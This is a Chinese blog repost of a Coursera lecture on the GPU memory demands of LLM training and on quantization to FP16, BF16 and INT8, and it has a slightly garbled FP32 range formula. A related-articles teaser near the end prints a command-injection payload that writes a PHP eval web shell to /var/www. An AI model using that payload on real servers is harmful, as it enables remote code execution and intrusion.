LLMs训练的算力优化Computational challenges of training LLMs

news2025/1/22 9:05:43

当您尝试训练大型语言模型时,您仍然经常遇到的最常见问题之一是内存不足。如果您曾尝试在Nvidia GPU上训练或甚至只是加载模型,那么这个错误消息可能看起来很熟悉。
在这里插入图片描述

CUDA,即Compute Unified Device Architecture的缩写,是为Nvidia GPU开发的库和工具集合。像PyTorch和TensorFlow这样的库使用CUDA来提高深度学习中常见操作的性能。

您会遇到这些内存不足的问题,因为大多数LLM都很大,需要大量的内存来存储和训练它们的所有参数。

让我们快速做些数学计算,以了解问题的规模。单个参数通常由32位浮点数表示,这是计算机表示实数的一种方式。您将很快看到如何以此格式存储数字的更多详细信息。32位浮点数占用四个字节的内存。因此,要存储十亿个参数,您需要四个字节乘以十亿个参数,或32位全精度下的4GB的GPU RAM。
在这里插入图片描述

这是很多的内存,注意,到目前为止,我们只计算了存储模型权重所需的内存。如果您想训练模型,您还必须为训练期间使用的GPU内存的其他组件做计划。这些包括两个Adam优化器状态、梯度、激活以及函数所需的临时变量。这可以轻松地导致每个模型参数需要额外的20个字节的内存。

在这里插入图片描述
实际上,为了考虑到训练期间的所有这些开销,您实际上需要的GPU RAM量是模型权重单独占用的大约20倍。
在这里插入图片描述

要在32位全精度下训练一个十亿参数的模型,您需要大约80GB的GPU RAM。
在这里插入图片描述

这对于消费者硬件来说绝对太大了,即使对于数据中心使用的硬件来说,如果您想使用单个处理器进行训练,也是具有挑战性的。80GB是单个Nvidia A100 GPU的内存容量,这是云中用于机器学习任务的常见处理器。

您有哪些选择来减少训练所需的内存?您可以使用的一种减少内存的技术称为量化。这里的主要思想是,通过将它们的精度从32位浮点数减少到16位浮点数或8位整数,来减少存储模型权重所需的内存。
在这里插入图片描述

深度学习框架和库中使用的相应数据类型是FP32用于32位全位置,FP16或Bfloat16用于16位半精度,以及int8 eight-bit整数。
在这里插入图片描述

您可以使用FP32表示的数字范围从大约 3 ∗ 1 0 − 38 3 * 10^{-38} 31038 3 ∗ 1 0 38 3 * 10^{38} 31038

默认情况下,模型权重、激活和其他模型参数都存储在FP32中。量化统计地将原始32位浮点数投影到基于原始32位浮点数范围计算的缩放因子的低精度空间。
在这里插入图片描述

让我们看一个例子。假设您想在不同的位置存储PI到小数点后六位。浮点数存储为一系列位,零和一。在FP32中存储数字的32位由一个位表示符号,其中零表示正数,而一表示负数。然后是8位表示数字的指数,以及表示数字的小数的23位。小数也称为尾数或有效数字。它表示数字的精确位。如果您将32位浮点值转换回十进制值,您会注意到精度的轻微损失。为了参考,这是Pi的实际值,精确到19位小数。
在这里插入图片描述

现在,让我们看看如果您将这个FP32表示的Pi投影到FP16,16位低精度空间会发生什么。16位由一个位表示符号,如您所见的FP32,但现在FP16只分配五位来表示指数和10位来表示小数。因此,您可以使用FP16表示的数字范围远远小于从负65,504到正65,504。原始FP32值在16位空间中被投影到3.140625。注意,您在这个投影中失去了一些精度。
在这里插入图片描述

您会发现,在大多数情况下,这种精度损失是可以接受的,因为您正在优化内存占用。

在FP32中存储一个值需要四个字节的内存。相反,以FP16存储一个值只需要两个字节的内存,所以通过量化,您将内存需求减少了一半。
在这里插入图片描述

AI研究社区已经探索了如何优化16位量化的方法。尤其是BFLOAT16,最近已经成为FP16的流行替代品。BFLOAT16,简称Brain Floating Point Format,是在Google Brain开发的,已经成为深度学习中的流行选择。许多LLM,包括FLAN-T5,都使用BFLOAT16进行了预训练。

BFLOAT16或BF16是半精度FP16和全精度FP32之间的混合体。BF16显著地帮助训练稳定性,并得到了NVIDIA的A100等较新GPU的支持。BFLOAT16通常被描述为一个截断的32位浮点数,因为它捕获了完整的32位浮点数的完整动态范围,但只使用了16位。

BFLOAT16使用完整的八位来表示指数,但将小数截断为只有七位。这不仅节省了内存,而且通过加速计算提高了模型性能。缺点是BF16不适合整数计算,但在深度学习中这些相对较少。
在这里插入图片描述

为了完整起见,让我们看看如果您将Pi从32位量化到更低精度的8位空间会发生什么。如果您使用一个位表示符号,INT8值由其余的七位表示。这给了你一个范围来表示从负128到正127的数字,不出所料,Pi在8位低精度空间中被投影到或3。这将新的内存需求从原来的四个字节减少到只有一个字节,但显然导致了相当大的精度损失。
在这里插入图片描述

让我们总结一下您在这里学到的内容,并强调您应该从这次讨论中得到的关键点。

请记住,

  1. 量化的目标是通过减少模型权重的精度来减少存储和训练模型所需的内存。
  2. 量化统计地将原始32位浮点数投影到使用基于原始32位浮点数范围计算的缩放因子的低精度空间。
  3. 现代深度学习框架和库支持量化感知训练,该训练在训练过程中学习量化缩放因子。这个过程的细节超出了这门课程的范围。但您已经看到了这里的关键点,即您可以使用量化来减少训练期间模型的内存占用。
  4. BFLOAT16已经成为深度学习中的流行选择,因为它保持了FP32的动态范围,但将内存占用减少了一半。许多LLM,包括FLAN-T5,都使用BFOLAT16进行了预训练。
    在这里插入图片描述

请在下周的实验室中注意BFLOAT16的提及。

现在,让我们回到将模型适应GPU内存的挑战,并看看量化可能带来的影响。通过应用量化,您可以将存储模型参数所需的内存消耗减少到只有2GB,使用16位半精度,节省了50%。您可以通过将模型参数表示为8位整数,进一步减少内存占用,这只需要1GB的GPU RAM。请注意,在所有这些情况下,您仍然有一个拥有十亿参数的模型。正如您所看到的,代表模型的圆圈大小相同。
在这里插入图片描述

量化在训练时也会给您带来同样程度的节省。正如您之前听到的,当您尝试在32位全精度下训练一个十亿参数的模型时,您很快就会达到单个NVIDIA A100 GPU的80 GB内存的限制。当您尝试在单个GPU上进行训练时,如果您想使用16位或8位量化,您需要考虑使用它。
在这里插入图片描述

请记住,现在许多模型的大小超过了500亿甚至1000亿参数。这意味着您需要更多的内存容量来训练它们,数万GB。这些巨大的模型使我们一直在考虑的十亿参数模型相形见绌,
在这里插入图片描述

如左图所示。当模型规模超过几十亿参数时,使用单个GPU进行训练变得不可能。相反,您需要转向分布式计算技术,同时在多个GPU上训练模型。这可能需要访问数百个GPU,这是非常昂贵的。
在这里插入图片描述

这也是为什么您大多数时候不会从头开始预训练自己的模型的另一个原因。

但是,还有一个额外的训练过程叫做微调,您将在下周了解。也需要在内存中存储所有训练参数,而且您很可能希望在某个时候微调模型。

为了帮助您更多地了解跨GPU训练的技术方面,我们为您准备了一个可选的视频。它非常详细,但它将帮助您了解一些为开发人员提供的训练更大模型的选项。您应该随意跳过这个视频。但如果您有兴趣了解更多,我希望您会查看它。

参考

https://www.coursera.org/learn/generative-ai-with-llms/lecture/gZArr/computational-challenges-of-training-llms

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/914340.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Lnton羚通云算力平台OpenCV-PythonCanny边缘检测教程

Canny 边缘检测是一种经典的边缘检测算法,由 John F. Canny 在 1986 年提出。它被广泛应用于计算机视觉和图像处理领域,用于检测图像中的边缘。 ​【原理】 1. 去噪 由于边缘检测非常容易收到图像的噪声影响,第一步使用 5x5 高斯滤波去除图…

【Linux】数据链路层:以太网协议

约束不等于压迫,冷静和理性不等于冷淡和麻木。 文章目录 一、以太网帧 和 局域网转发数据包1.局域网转发的原理(基于以太网协议)2.以太网MTU与MAC地址 二、局域网中的数据碰撞1.如何解决局域网中的数据碰撞?(碰撞检测和…

[保研/考研机试] KY223 二叉排序树 华中科技大学复试上机题 C++实现

题目链接: 二叉排序树_牛客题霸_牛客网输入一系列整数,建立二叉排序树,并进行前序,中序,后序遍历。。题目来自【牛客题霸】https://www.nowcoder.com/share/jump/437195121692722441741 描述 输入一系列整数&#x…

springMVC之视图

文章目录 前言一、ThymeleafView二、转发视图三、重定向视图四、视图控制器view-controller五、补充总结 前言 SpringMVC中的视图是View接口,视图的作用渲染数据,将模型Model中的数据展示给用户。 SpringMVC视图的种类很多,默认有转发视图和…

原生轮播图的实现

<!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>轮播图</title><style>* {margin: 0;pad…

【网络】IP网络层和数据链路层

IP协议详解 1.概念 1.1 四层模型 应用层&#xff1a;解决如何传输数据&#xff08;依照什么格式/协议处理数据&#xff09;的问题传输层&#xff1a;解决可靠性问题网络层&#xff1a;数据往哪里传&#xff0c;怎么找到目标主机数据链路层&#xff08;物理层&#xff09;&…

C++:list使用以及模拟实现

list使用以及模拟实现 list介绍list常用接口1.构造2.迭代器3.容量4.访问数据5.增删查改6.迭代器失效 list模拟实现1.迭代器的实现2.完整代码 list介绍 list是一个类模板&#xff0c;加<类型>实例化才是具体的类。list是可以在任意位置进行插入和删除的序列式容器。list的…

MySQL不停重启问题

MySQL不停的自动杀掉自动重启 看一下log日志 my.cnf 里配置的 log_error /var/log/mysqld.log vim /var/log/mysqld.log 报的错误只是 [ERROR] Cant start server: Bind on TCP/IP port: Address already in use [ERROR] Do you already have another mysqld server …

LLMs高效的多 GPU 计算策略Efficient multi-GPU compute strategies

很有可能在某个时候&#xff0c;您需要将模型训练工作扩展到超过一个GPU。在上一个视频中&#xff0c;我强调了当您的模型变得太大而无法适应单个GPU时&#xff0c;您需要使用多GPU计算策略。但即使您的模型确实适合单个GPU&#xff0c;使用多个GPU加速训练也有好处。即使您正在…

Java 项目日志实例:综合应用

点击下方关注我&#xff0c;然后右上角点击...“设为星标”&#xff0c;就能第一时间收到更新推送啦~~~ 本文介绍 JCL(java common logging) 和 SLF4J 分别与 Log4j 结合使用的示例。 1 JCL Log4j 使用示例 1、JCL(java common logging) Log4j 介绍 使用 commons-logging 的 …

Java 实战项目-SpringBoot+Vue 的智慧养老平台,附源码、教程

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝30W,Csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 文章目录 1.研究背景2. 技术栈3.系统分析4系统设计4.1 软件功能模块设计4.2数据库设计与实现 5系统详细设计…

bode100测量频率响应的基本原理

当使用Bode 100进行频率响应测量时&#xff0c;它会同时测量幅频响应曲线和相频响应曲线。下面是对这两个曲线测量方法的进一步解释&#xff1a; 幅频响应曲线测量&#xff1a; 幅频响应曲线描述了系统在不同频率下输入信号的幅度变化。Bode 100通过以下步骤测量并绘制幅频响应…

基于Jenkins自动打包并部署Tomcat环境

目录 1、配置git主机 2、配置jenkins主机 3、配置web主机 4、新建Maven项目 5、验证 Jenkins 自动打包部署结果 Jenkins 的工作原理是先将源代码从 SVN/Git 版本控制系统中拷贝一份到本地&#xff0c;然后根据设置的脚本调用Maven进行 build&#xff08;构建&#xff09;。…

框架分析(2)-React

框架分析&#xff08;2&#xff09;-React 专栏介绍React核心思想关键特性和功能组件化开发单向数据流JSX语法强大的生态系统 优缺点分析优点缺点 专栏介绍 link 主要对目前市面上常见的框架进行分析和总结&#xff0c;希望有兴趣的小伙伴们可以看一下&#xff0c;会持续更新的…

网络:RIP协议

1. RIP协议原理介绍 RIP是一种比较简单的内部网关协议&#xff08;IGP协议&#xff09;&#xff0c;RIP基于距离矢量的贝尔曼-福特算法(Bellman - Ford)来计算到达目的网络的最佳路径。最初的RIP协议开发时间较早&#xff0c;所以在带宽、配置和管理方面的要求也较低。 路由器运…

Linux下的Shell编程——正则表达式入门(四)

前言&#xff1a; 正则表达式使用单个字符串来描述、匹配一系列符合某个语法规则的字符串。在很多文本编辑器里&#xff0c;正则表达式通常被用来检索、替换那些符合某个模式的文本。 在Linux 中&#xff0c;grep&#xff0c;sed&#xff0c;awk 等文本处理工具都支持…

一句话木马攻击复现:揭示黑客入侵的实战过程

准备环境 OWASP虚拟机xfp 7与xshell 7 ​ DVWA系统默认的账号密码均为&#xff1a;admin/admin 1、命令注入中复现 ​ 攻击payload 127.0.0.1 | echo "<?php eval(\$_POST[\"cmd\"])?>" > /var/www/shell.php 这个命令的目的是在服务器…

从一些常见的错误聊聊mysql服务端的关键配置 | 京东云技术团队

背景 每一年都进行大促前压测&#xff0c;每一次都需要再次关注到一些基础资源的使用问题&#xff0c;订单中心这边数据库比较多&#xff0c;最近频繁报数据库异常&#xff0c;所以对数据库一些配置问题也进行了研究&#xff0c;本文给出一些常见的数据库配置&#xff0c;说明…

聚类分析 | MATLAB实现GMM高斯分布混合模型的聚类结果可视化

聚类分析 | MATLAB实现GMM高斯分布混合模型的聚类结果可视化 目录 聚类分析 | MATLAB实现GMM高斯分布混合模型的聚类结果可视化效果一览基本介绍程序设计参考资料 效果一览 基本介绍 聚类分析 | MATLAB实现GMM高斯分布混合模型的聚类结果可视化&#xff0c;GMM聚类&#xff0c;…

抖音短视频矩阵系统源码开发搭建技术开源分享

前言&#xff1a;抖音矩阵号/抖音短视频SEO矩阵系统源码开发&#xff0c;优化排名。 短视频获客系统支持短视频智能剪辑、短视频定时发布&#xff0c;短视频排名查询及优化&#xff0c;智能客服等&#xff0c;那么短视频seo系统开发时需要开发哪些功能呢&#xff1f;今天我就跟…